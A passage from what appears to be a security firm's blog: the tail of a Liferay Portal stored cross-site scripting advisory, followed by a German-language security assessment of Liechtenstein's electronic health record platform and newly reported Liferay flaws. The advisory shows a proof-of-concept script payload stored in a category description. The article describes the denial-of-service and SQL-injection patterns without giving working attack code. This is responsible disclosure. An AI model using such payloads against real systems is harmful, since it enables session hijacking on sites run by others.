Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_inputPermissionsViewRole"

Guest
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_guestPermissions"

VIEW
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_groupPermissions"

VIEW
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_checkboxNames"

multiValued,required0
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="p_auth"

GgaH6PDc
-----------------------------23385551494836211141651886319--

Later, when a user requests a vocabulary entry, for example via a HTTP GET request to /group/speedwell/~/control_panel/manage/-/categories_admin/vocabulary/35897, the HTTP response is:

HTTP/1.1 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, no-cache, no-store, must-revalidate
Pragma: no-cache
Liferay-Portal: Liferay Community Edition Portal
Content-Type: text/html;charset=UTF-8
Date: Mon, 16 Oct 2023 11:05:58 GMT
Connection: close
Content-Length: 128719

[...]
<div class="sheet sheet-full">
    <h2 class="sheet-title">
        <div class="autofit-row autofit-row-center">
            <div class="autofit-col">
                MyCategory
            </div>
[...]
            <div class="mb-2">
                <span class="mr-1">Description:</span>
                <span class="text-break text-secondary"><script>alert("description")</script></span>
            </div>

    </div>
[...]

Precondition

The affected modules must be enabled and used. Furthermore, an attacker must have the permission to enter the corresponding data. So it depends how the permissions are defined in a specific Liferay Portal instance.

It may be possible that guests are allowed to submit wiki pages or order products without a user account. Though adding new vocabulary to categories or regions to countries may be reserved for users with higher privileges.

Recommendation

Pentagrid recommends to update the Liferay Portal version. According to Liferay:

CVE-2023-42627 is fixed in Liferay Portal 7.4.3.92.
CVE-2023-42628 is fixed in Liferay Portal 7.4.3.88.
CVE-2023-42629 is fixed in Liferay Portal 7.4.3.88.

Credits

These vulnerabilities have been found by Michael Oelke (Pentagrid). We would like to thank Samuel Kong (Liferay) for the professional handling of the security issues.

IT-Sicherheit beim elektronischen Gesundheitsdossier im Fürstentum Liechtenstein

Pentagrid AG — Thu, 14 Sep 2023 20:30:00 GMT

Am 1. Januar 2022 trat im Fürstentum Liechtenstein das Gesetz zum elektronischen Gesundheitsdossier (EGDG) in Kraft. Das elektronische Gesundheitsdossier (eGD) wird für alle 39'000 Bürger eingeführt, welche nicht Widerspruch einlegen und diesem Widerspruch eine Passkopie beilegen. Wir haben uns das genauer angeschaut.

Eine journalistische Aufbereitung unserer Befunde gibt es beim Liechtensteiner Vaterland (Paywall).

Gesundheitsdienstleister sind seit Juli 2023 verpflichtet, die Daten in das eGD einzutragen, ausser der Patient widerspricht dem wiederum explizit. Zu den Gesundheitsdienstleistern gehören das Liechtensteinische Landesspital, die Liechtensteinische Alters- und Krankenhilfe, andere Einrichtungen des Gesundheitswesens im Sinne des Gesundheitsgesetzes (mit Ausnahmen), Ärzte, Apotheker, Chiropraktoren und Zahnärzte. Erlaubt ist beispielsweise explizit auch die Eintragung von genetischen Daten. Jeder Bürger kann grundsätzlich die Löschung der Daten veranlassen. In einem ersten Schritt ist dem eGD jedoch ein Datenreichtum an einem zentralisierten Ort sicher, im Gegensatz zur Schweiz, wo explizit der Patient ein solches elektronisches Dossier anlegen muss. Für den Zugang zum eGD-Portal ist allerdings ebenfalls eine Digitale Identität (eID) erforderlich, sonst kann ein Bürger das elektronische Gesundheitsdossier nicht nutzen bzw. kann lediglich online Formulare (via Upload einer Passkopie) verwenden.

Dieser Artikel stellt eine unabhängige Drittsicht auf das Gesundheitsdossier dar.

Im Folgenden werden zuerst die technischen Gegebenheiten des Gesundheitsdossier näher erläutert. Anschliessend folgt eine Einschätzung und weitere Betrachtung aus Sicht der Pentagrid AG und unserer langjährigen Erfahrung im Testen der technischen IT-Sicherheit von Systemen.

Technische Fakten zum elektronischen Gesundheitsdossier

Die Liechtensteinische Landesverwaltung veröffentlichte auf ihrer Webseite einen Bereich zum elektronischen Gesundheitsdossier in Liechtenstein. Dabei sind für den Datenschutz relevante Informationen auf einer eigenen Seite aufgelistet. Hier lässt sich nachlesen, dass die Siemens Healthcare AG (Siemens) mit Sitz in Zürich als externer Systemlieferant Auftragsverarbeiter für das Amt für Gesundheit ist. Ausserdem hat Siemens die MTF Solutions AG (MTF) mit Sitz in Worblaufen für die IT-Infrastruktur und das Hosting der eHealth-Plattform unterbeauftragt. Ferner ist nachzulesen: "Die Firma Siemens kann zu Supportzwecken auf die Daten über ihr Servicezentrum in Fürth, Deutschland, zugreifen. In Deutschland werden aber keine Daten gespeichert."

Die Webseite für Privatpersonen ist, wie vom Amt für Gesundheit publiziert, unter der URL https://prod.gesundheitsdossier.li/ erreichbar.

Ermittelt man die IP-Adressen, welche zu dieser Webseite gehören (über sogenannte DNS-Auflösung), erhält man folgende drei Einträge:

104.22.46.254
104.22.47.254
172.67.7.104

Die Frage ist, wem diese drei IP-Adressen gehören. Sucht man im öffentlich einsehbaren WHOIS-Dienst im Internet, findet man folgenden Besitzer:

OrgName:        Cloudflare, Inc.
OrgId:          CLOUD14
Address:        101 Townsend Street
City:           San Francisco
StateProv:      CA
PostalCode:     94107
Country:        US

Dieses Unternehmen wird in der Datenschutzerklärung zum Zeitpunkt der Artikelveröffentlichung nicht erwähnt.

Wer in der IT tätig ist, kennt Cloudflare. Obwohl auch weitere Dienste von Cloudflare bezogen werden können, hat sich Cloudflare insbesondere einen Namen gemacht bei der Abwehr von sogenannten Distributed-Denial-of-Service-Angriffen (DDoS). Cloudflare soll also dabei helfen, dass Angreifer die elektronische Gesundheitsdossier-Webseite nicht für einen Zeitraum unbenutzbar machen können. DDoS ist ein reales Problem, wie gerade erst kürzlich der Angriff auf verschiedene staatliche Organisationen in der Schweiz zeigte. Trotzdem heisst das im Klartext: Jede Kommunikation zur Gesundheitsdossier-Webseite wird erst einmal zu IP-Adressen der amerikanischen Firma CloudFlare gesendet.

Das Antragsformular für den Zugriff für Gesundheitsdienstleister ist grundsätzlich nicht auf gesundheitsdossier.li erreichbar, sondern wird auf der Webseite der Landesverwaltung zur Verfügung gestellt.

Sucht man etwas weiter auf der Domäne gesundheitsdossier.li, finden sich weitere Webseiten, welche wohl sogenannten Test- und Abnahme-Umgebungen entsprechen. Diese nutzt die Landesverwaltung/Siemens wahrscheinlich intern, um Updates zu testen, bevor diese in der Produktivumgebung eingespielt werden. Das ist durchaus üblich in der IT. Manche Unternehmen finden es wichtig, dass diese Systeme lediglich aus dem internen Unternehmensnetzwerk erreichbar sind, schliesslich sind diese Systeme reine Testsysteme und müssen dem Bürger nicht zur Verfügung gestellt werden. Viele Unternehmen stellen diese heute aber auch öffentlich ins Internet, wie in diesem Fall hier. Diese Webseiten lösen ebenfalls zu den gleichen IP-Adressen von CloudFlare auf.

Es finden sich noch weitere Webseiten unter gesundheitsdossier.li, welche mutmasslich Application Programming Interfaces (APIs) zur Verfügung stellen, also Möglichkeiten wie automatisiert Daten abgefragt werden können, beispielsweise durch eine mobile Applikation. Auch gibt es diese wiederum in den Varianten Test-API, Abnahme-API und Produktions-API. Diese Webseiten lösen allerdings zu der IP-Adresse 217.148.8.81 auf, welche der in den Datenschutzhinweisen erwähnten MTF Solutions AG gehört.

Und dann gibt es noch eine letzte Webseite unter gesundheitsdossier.li mit dem Namen Monitoring. Diese Webseite hat wohl die Software Nagios installiert. Nagios wird von IT-Abteilungen genutzt, um IT-Systeme hinsichtlich Verfügbarkeit und Serviceparametern zu überwachen.

Wenden wir unsere Aufmerksamkeit jetzt aber nochmals der Haupt-Webseite zu, auf welcher sich Liechtensteiner Bürger einloggen werden. Beim Blick auf die gesendeten Daten auf dem Netzwerk fällt sofort auf, dass diese Webseite die sogenannte "Liferay Portal"-Software in der Open-Source-Variante verwendet (Community Edition). Diese Software wird als Open Source (also jeder kann dazu beitragen) von der Liferay Inc. in den USA entwickelt. Grundsätzlich bedeutet das, dass der Programmcode, welchen Siemens für das Amt für Gesundheit betreibt, frei für jeden zum Download verfügbar steht.

Interessant ist auch, dass über die Webseite des Gesundheitsdossiers auch das Logo von Siemens angezeigt werden kann. Das Logo ist aber nicht das Logo der Siemens Healthcare AG in Zürich, welche in den Datenschutzhinweisen genannt. Es handelt sich stattdessen um das Logo der ITH icoserve technology for healthcare GmbH in Innsbruck, welche wiederum eine Tochtergsellschaft der Siemens Healthcare GmbH in Erlangen (Deutschland) ist.

Auf der Gesundheitsdossier-Webseite sind ausserdem verschiedene Funktionen und Web-Schnittstellen erreichbar. Es handelt sich dabei um Komponenten, welche standardmässig mit Liferay mitgeliefert werden. Dazu gehören:

Liferay stellt standardmässig GraphQL zur Verfügung und dabei ist GraphQL-Introspektion auf dem Gesundheitsdossier aktiviert. Dadurch erhält man technische Informationen über Abfragemöglichkeiten.

Liferay stellt standardmässig JSON-WS zur Verfügung. Das ist eine weitere API, wenn Drittprogramme automatisiert mit dem Portal kommunizieren wollen.
Liferay erlaubt standardmässig Cross-Origin Resource Sharing (CORS) auf gewissen URLs (GraphQL, JSON-WS sowie auf URLs wie /documents/) und erlaubt dabei beliebige Drittseiten. Das bedeutet zunächst, dass andere Webseiten im Internet Anfragen an die Gesundheitsdossier-Webseite stellen können. Das ist dann relevant, wenn ein Browser in einer angemeldeten Session Funktionen des Portals nutzen kann.
Liferay hat ganz generell eine grosse Palette an Anwendungsmöglichkeiten und Funktionen eingebaut.

Inwiefern alle diese Komponenten beim Gesundheitsdossier zum Einsatz kommen ist nicht bekannt. Mit mehr zur Verfügung stehenden Schnittstellen, vergrössert sich in der IT jeweils die Angriffsfläche.

Einschätzung der Pentagrid AG

Die obenstehenden technischen Fakten werden nun weiter eingeordnet. Dabei gibt es verschiedene Themenbereiche, die in Unterkapiteln erläutert werden.

Kritik am Datenschutz

Personen, welche für den Datenschutz zuständig sind (Datenschutzbeauftragte), folgen oftmals der Logik, dass der Datenstandort für den Datenschutz tatsächlich wichtig ist. Und wie oben beschrieben gilt in diesem Fall der Datenstandort Schweiz. Es ist auch wahrscheinlich, dass sich viele Juristen dieser Sicht anschliessen und dies rechtlich korrekt ist (wir sind keine Juristen). Allerdings sollte jedem klar sein, dass viel wichtiger ist wer im Endeffekt denn auf die Daten zugreifen kann.

Interessant ist hierbei, dass in den Datenschutzhinweisen bereits explizit eine Ausnahme zugelassen ist, nämlich dass Siemens für Supportzwecke aus Fürth (Deutschland) zugreifen darf.

In der Praxis ist der Datenstandort aber weniger relevant, denn für amerikanische Firmen gilt ohnehin der Cloud Act und wird mit einem Satz treffend auf Wikipedia erklärt: "Das Gesetz verpflichtet amerikanische Internet-Firmen und IT-Dienstleister, US-Behörden auch dann Zugriff auf gespeicherte Daten zu gewährleisten, wenn die Speicherung nicht in den USA erfolgt". Inwiefern die Verwendung der amerikanischen Unternehmen Cloudflare als Dienstleister oder Liferay als Software-Lieferant diesbezüglich eine Rolle spielt, sei dahingestellt...

Als IT-Sicherheitsexperten, die tagtäglich den Abfluss von Daten sehen, fühlen wir uns der Datensparsamkeit verpflichtet. Täglich scheitern Unternehmen daran, wichtige Daten geheim zu halten. Beispiele gibt es genug, das kürzliche Datenleck bei xplain.ch mit Daten von verschiedenen Kantonspolizeien und der Bundespolizei (bei dem auch Daten zur Liechtensteiner Polizei enthalten waren) ist nur eines davon.

Eine zentrale Speicherung von Gesundheitsdaten standardmässig für jeden Bürger einzuführen, scheint deshalb fragwürdig. Das Dossier wird auch für Bürger eingeführt, welche über keine eID verfügen und somit das Dossier nicht komplett nutzen können. Trotzdem werden Daten zentral gesammelt. Auch Hinweise in den Fragen und Antworten zum Gesundheitsdossier, dass der Nutzen von eHealth die "Gewährleistung Anbindung mit Nachbarländern und darüber hinaus" sein soll, klingen eher nach Überwachungsstaat als Dienst für den Bürger.

Kritik an der Authentifizierung via Passkopie

Alle Bürger, welche über keine eID verfügen, können per E-Mail oder Online-Formular Antrag auf Zugang stellen, wenn eine Passkopie mitgesendet wird. Allerdings werden Passkopien auch von Autovermietungen oder Hotels angefertigt, womit die Sicherheit dieser Vorgänge nicht sichergestellt ist. Unter anderem kann auch eine Stellvertretung für das elektronische Gesundheitsdossier auf diesem Weg beantragt werden.

Die Einführung einer solchen unsicheren Methode widerspricht der auf der Webseite im Bereich Fragen und Antworten dokumentierten Aussage, dass "heutige Kommunikation mittels E-Mail, Chats, Fax und Brief [...] weder einen hohen Datenschutz noch eine hohe Datensicherheit" bietet.

Anmerkung zum DDoS-Schutz durch Cloudflare

Cloudflare bietet grundsätzlich einen Schutz vor Denial-of-Service-Angriffen, bei denen mittels vieler gleichzeitiger Anfragen Ressourcen einer Webanwendung so verbraucht werden, dass keine weiteren Anfragen mehr möglich sind. Allerdings ist dabei wichtig, dass für einen Angreifer lediglich die IP-Adressen von Cloudflare bekannt sind, nicht die der Server der MTF in diesem Fall. Es stellt sich also grundsätzlich die Frage, ob der Schutz überhaupt effektiv ist, wenn die IP-Adressen bei der MTF für die APIs bekannt sind. Mit dem momentanen Kenntnisstand kann dies nicht abschliessend beurteilt werden.

Kritik an der Erreichbarkeit von Systemen aus dem Internet

Es ist nicht gängige Praxis, dass ein System wie Nagios im Internet erreichbar ist, welches lediglich der Überwachung von IT-Systemen dient. Der Zugriff verlangt nach einem Benutzernamen und einem Passwort. Grundsätzlich scheint aber ein Login aus dem Internet möglich, wenn jemand ein gültiges Passwort besitzt. Warum dieses System aus dem Internet erreichbar ist oder ob dies so gewollt ist, ist unklar. Ein solches Überwachungssystem muss lediglich den IT-Adminstratoren zur Verfügung stehen, welche die Systeme betreuen. Da dieses System jedoch im Internet grundsätzlich ansprechbar ist, bietet der Betrieb dieser Software unnötig Angriffsfläche. Kennt ein Angreifer eine Schwachstelle der Nagios Software, kann er diese über das Internet ausnutzen. Solche Schwachstellen gibt es immer wieder für Nagios und lassen sich online nachlesen.

Auch die Test- und Abnahme-Umgebungen sind grundsätzlich nicht für den produktiven Betrieb notwendig und bieten somit nur unnötig Angriffsfläche.

Anmerkung zu zusätzlichem Webserver-Schutz

Die Gesundheitsdossier-Webseite verwendet keinen HTTP-Header Content-Security-Policy (CSP), welcher bei strikter Umsetzung die Problematik von Cross-Site-Scripting-Schwachstellen entschärfen könnte.

Verwundbarkeiten in Liferay

Grundsätzlich ist es zu begrüssen, dass die verwendete Software Liferay als Open Source zur Verfügung steht. Dies vereinfacht das Suchen nach Schwachstellen in der Software.

Open Source bedeutet nicht, dass eine Einzelperson unentgeltlich in der Freizeit Software entwickelt. Kommerzielle Nutzung und Open Source schliessen sich nicht aus und passen sogar gut zusammen. Das Liferay-Portal gibt es seit dem Jahr 2000. 2004 wurde für die Verwaltung die Liferay, Inc. gegründet. Der Hauptsitz ist in den USA. Es gibt diverse europäische Niederlassungen, Vertretungen in Brasilen, Australien, Marokko, Singapur, Indien, China und Japan. Weltweit gibt es 20 Büros gemäss der Webseiten von Liferay, also auf allen Kontinenten, ausser der Antarktis. Liferay hat nach Eigenauskunft über 1000 Angestellte.

Wichtig ist hier anzumerken, dass die Liferay-Software aus sehr vielen verschiedenen Modulen besteht. Beispielsweise gibt es ein Modul, welches zum Aufbau eines Online-Shops verwendet werden kann. Unter anderem hat Liferay im administrativen Portal Funktionen wie die Gogo- oder Groovy-Shell, um direkt über die administrative Webseite Kommandos auf dem Server auszuführen. Auch können IT-Administratoren im Web-Interface auswählen, dass das Web-Interface aus den Augen eines gewissen Benutzers betrachtet werden soll (user impersonation). Inwiefern die Schwachstellen der einzelnen Module jeweils auch für das elektronische Gesundheitsdossier in Liechtenstein zutreffen, kann ohne Untersuchung des Gesundheitsdossier-Portals selbst nicht direkt beantwortet werden.

Leider lässt sich die Sicherheit einer Software wie Liferay niemals final beurteilen. Festzustellen, dass eine Software "sicher" ist, gilt in der IT als unmöglich. Sicher ist nur, dass Komplexität und IT-Sicherheit meist unverträglich sind.

Auch die Schwachstellen, die eine Software in der Vergangenheit hatte, lassen prinzipiell keine Rückschlüsse auf die Sicherheit zu. Eine Ausnahme ist, wenn sich Hinweise ergeben, dass die Softwareentwickler Probleme nicht systematisch angehen. Eine gewisse Schwachstellen-Kategorie sollte systematisch verhindert werden, damit diese nicht wieder vorkommt. Ist dies nicht der Fall, ist es wahrscheinlich, dass auch in Zukunft neue Schwachstellen auftreten. Dann liesse sich der Software wegen des mangelhaften Entwicklungs- bzw. Fehlerbehebungsvorgehens eher eine schlechtes Sicherheitniveau attestieren.

Die Informationen zu den Sicherheitslücken von Liferay Portal in der Vergangenheit lassen aufhorchen. Anscheinend hatte diese Software alleine in den sieben Monaten des 2023 bereits 17 Schwachstellen. Ausserdem wird dieselbe Schwachstellen-Kategorie sehr oft genannt und kommt immer wieder vor. Nicht alle Schwachstellen in der IT Sicherheit haben die gleichen Auswirkungen, aber trotzdem finden sich gleich mehrere Anleitungen im Internet (sogenannte Exploits), wie eine alte Version von Liferay aus 2020 komplett von einem Angreifer übernommen werden kann.

Wir wollten dies genauer wissen und haben uns die Liferay-Software angeschaut.

Auffällige Code-Muster in Liferay

Um eine Einschätzung der Software machen zu können, haben wir zuerst den Quellcode in der Version 7.4.3.84 heruntergeladen. Sucht man im Quellcode von Liferay nach bestimmten Mustern, die üblicherweise IT-Schwachstellen zeigen, wird man sofort fündig.

Es scheint als wären viele Code-Pfade verwundbar auf sogenannte Cross-Site-Scripting-Schwachstellen (XSS). Dabei sind dies sehr auffällige Muster, welche darauf hindeuten, dass Liferay keine Release-Qualitätssicherung macht, welche solche Muster findet, bevor die Software veröffentlicht wird.

Auch dass in den letzten 1.5 Jahren 20 Cross-Site-Scripting-Schwachstellen gefunden wurden, zeigt: Liferay hat keinen strategischen Ansatz um Schwachstellen zu verhindern und wiederholende Schwachstellen der gleichen Kategorie sind häufig.

Sucht man weiter nach Mustern, findet man beispielsweise in der Datei PermissionUpgradeProcess.java:

private void _upgradeResourcePermission(String name) throws Exception {
        try (PreparedStatement preparedStatement1 = connection.prepareStatement(
                        StringBundler.concat(
                                "select resourceActionId, bitwiseValue from ",
                                "ResourceAction where actionId = 'ADD_ENTRY' and name = '",
                                name, "'"));
                ResultSet resultSet1 = preparedStatement1.executeQuery())

Wer sich mit sicherer Programmierung auskennt erkennt: String-Formatierung (via StringBundler.concat) zum Erzeugen eines SQL-Statements zu nutzen, ist ein Anti-Pattern und kann zu SQL-Injektionen führen. Würde dieses Muster nur an einer Stelle verwendet, hätten wir uns angeschaut, ob es ein Sicherheitsrisiko darstellt. Allerdings hat der Quell-Code von Liferay sehr viele solcher Muster und wir haben deshalb nicht jedes Vorkommen eines solchen Musters überprüft.

Folgend nun neue Schwachstellen, welche wir während unserer Untersuchung gefunden und an Liferay Inc. gemeldet haben. Wir haben uns die Liferay-Software selbst auf unserem System installiert und eine Sicherheitsanalyse (in einem begrenzten Rahmen) durchgeführt.

Schwachstelle 1 bis 4: Cross-Site Scripting Schwachstellen

Wir haben insgesamt vier Cross-Site Scripting Schwachstellen identifiziert, welche wir an Liferay gemeldet haben und alle von Liferay bestätigt wurden. Für die Schwachstellen wurden die Identifikationsnummern CVE-2023-42627, CVE-2023-42628 und CVE-2023-42629 vergeben.

Bei manchen dieser Schwachstellen handelte es sich um Stored Cross-Site Scripting. Beispielsweise konnte eine Schwachstelle durch einen bestellenden Benutzer im Liferay-Shop ausgenutzt werden. Dabei wird der eingeschleuste Code anschliessend im Browser des Online-Shop-Betreibers/Administrators ausgeführt. Das bedeutet, ein Angreifer könnte beliebige Aktionen als Shop-Betreiber ausführen und womöglich den kompletten Online-Shop übernehmen. Die technischen Details zu den Verwundbarkeiten, werden wir später in einem separaten Advisory veröffentlichen. (Update 2023-10-17: Die Details zur den Cross-Site-Scripting-Schwachstellen in der Liferay-Portal-Software sind nun öffentlich.)

Inwiefern diese Schwachstellen ebenfalls auf dem Gesundheitsdossier ausgenutzt werden könnten, ist unklar.

Schwachstelle 5: Datenbankpasswort für wedeploy.com veröffentlicht

Das Unternehmen Liferay plante oder unterhielt zu einem Zeitpunkt einen Service mit dem Namen wedeploy.com. Zwar ist die Webseite mittlerweile nicht mehr erreichbar, trotzdem finden sich neben dem Code selbst auch noch Konfigurationen im Quellcode der Liferay-Software.

Anscheinend hat Liferay dabei das produktive Datenbankpasswort für den wedeploy.com-Service aus Versehen veröffentlich.

Wir haben diese Schwachstelle an Liferay gemeldet und diese wurde von Liferay bestätigt und das Passwort wurde geändert. Technische Anmerkung: Da Liferay nicht die alten Einträge der Versionskontrolle ändern möchte, da sonst Kompatibilitätsprobleme mit Forks auf Github entstehen können, ist das alte Passwort weiterhin in der Versionshistorie ersichtlich.

Gleichzeitig fiel auf, dass Liferay dieses Passwort nicht nur in der Produktion verwendet, sondern ebenfalls in der Umgebung für DEV (für development, also wiederum eine Testumgebung) und UAT (wiederum eine Abnahmeumgebung). Dieses Vorgehen ist nicht zu empfehlen. Passwörter sind unbedingt unterschiedlich auf Produktion und Testsystemen zu setzen. Ansonsten kann es passieren, dass ein Angreifer eine der anderen Umgebungen angreift und anschliessend über gültige Passwörter für die Produktion verfügt. Testumgebungen sind häufiger weniger gesichert, zeigen vielleicht Debug-Ausgaben oder sind tendenziell nicht im (Sicherheits-)Monitoring. Wenn ein Angreifer Dienste versehentlich unbenutzbar macht, dann fällt dies vielleicht gar nicht auf. Testumgebungen im Internet sind Industrie-Standard, aus Sicherheitsicht zwar nicht zu empfehlen, aber praktisch – auch für Angreifer.

Auf das Gesundheitsdossier hat das grundsätzlich keinen Einfluss, zeigt aber Probleme beim Lieferanten Liferay.

Schwachstelle 6: Verwundbare JavaScript-Bibliotheken

Es wird ausserdem eine JavaScript-Bibliothek mit bekannten Verwundbarkeiten verwendet, die Bibliothek ckeditor wird in Version 4.18.0 verwendet und ist von der Schwachstelle "CVE-2023-28439: Cross-Site Scripting" betroffen.

Schwachstellen in JavaScript-Bibliotheken sind ein gängiges Problem, insbesondere Cross-Site-Scripting-Schwachstellen sind zu erwarten. Dabei gilt: Nach der Schwachstelle ist vor der Schwachstelle. Das Vorhandensein von Verwundbarkeiten in Bibliotheken bedeutet nicht, dass die Lücken ausnutzbar sind, oder gar einfach ausnutzbar sind. Man ist dennoch gut beraten, Bibliotheken zu aktualisieren.

Diese Bibliothek ist insbesondere auch auf dem Gesundheitsdossier erreichbar. Inwiefern dieses Problem dort ausnutzbar ist, wurde nicht untersucht.

Schwachstelle 7: Denial of Service mittels einer verschachtelten Abfrage in GraphQL

Die GraphQL-Schnittstelle von Liferay is verwundbar auf eine Denial-of-Service-Schwachstelle, die von einem Angreifer ausgenutzt werden kann, wenn dieser eine verschachtelte Abfrage sendet. Die Schwachstelle erlaubt es, mit einer einzigen Anfrage den kompletten Speicher des Servers aufzubrauchen (java.lang.OutOfMemoryError). Anschliessend kann der Liferay-Server keine anderen Anfragen mehr entgegennehmen und erscheint für andere Nutzer unerreichbar.

Liferay hat geantwortet, dass sie über die Schwachstelle bereits Bescheid wissen und diese zu einem späteren Zeitpunkt erst beheben werden.

Es wird davon ausgegangen, dass auch die GraphQL Schnittstelle des Gesundheitsdossiers betroffen ist. Inwiefern dieses Problem dort tatsächlich ausnutzbar ist, wurde nicht untersucht.

Fazit

Wir haben keine Sicherheitsuntersuchung der Gesundheitsdossier-Webseite durchgeführt und melden an dieser Stelle auch nicht direkt Schwachstellen an die Landesverwaltung, da wir lediglich die zugrunde liegende Liferay-Software betrachtet haben. Schwachstellen von verwendeter Software abzuklären ist Aufgabe der Landesverwaltung. Inwiefern eine Sicherheitsprüfung durchgeführt wurde, ist uns nicht bekannt. Es ist uns aber wichtig, für Liechtensteiner Bürger mehr Transparenz zu schaffen.

Insgesamt ensteht bei der Betrachtung des Gesundheitsdossier im Fürstentum Liechtenstein folgender Eindruck:

Die Datenschutzhinweise erwähnen nicht alle Drittparteien (z. B. Cloudflare), die rein technisch involviert sind. Mindestens die Dienstleister, die Inhalte sehen können, sollten transparent genannt werden.
Es scheint als wurde nicht darauf geachtet, Risiken für das Gesundheitsdossier zu minimieren. Beispielsweise die Erreichbarkeit aus dem Internet einzuschränken, Sicherheitskonfigurationen hinzuzufügen oder Komponenten (beispielsweise von Liferay) zu sperren, zu entfernen oder zu deaktivieren.
Das Liferay-Portal hinterlässt nicht den Eindruck, dass bei dessen Entwicklung wirksame Qualitätsprüfungen vor Veröffentlichung stattfinden, die auch Sicherheitseigenschaften prüfen. Als Quasi-Lieferant der Software ist Liferay ausserdem zu betrachten bei Themen wie Supply-Chain-Angriffen. Zusammen mit der hohen Komplexität und der verwendeten und erreichbaren Komponenten, scheint Liferay eine fragliche Wahl für die Umsetzung einer so kritischen Applikation wie dem Gesundheitsdossier zu sein.

Aktualisierung 2023-09-18: Artikel "Hacker orten Schwachstellen bei Software-Anbieter" der Tageszeitung Vaterland verlinkt.

Aktualisierung 2023-10-17: Advisory zu den Cross-Site-Scripting-Schwachstellen in der Liferay-Portal-Software verlinkt.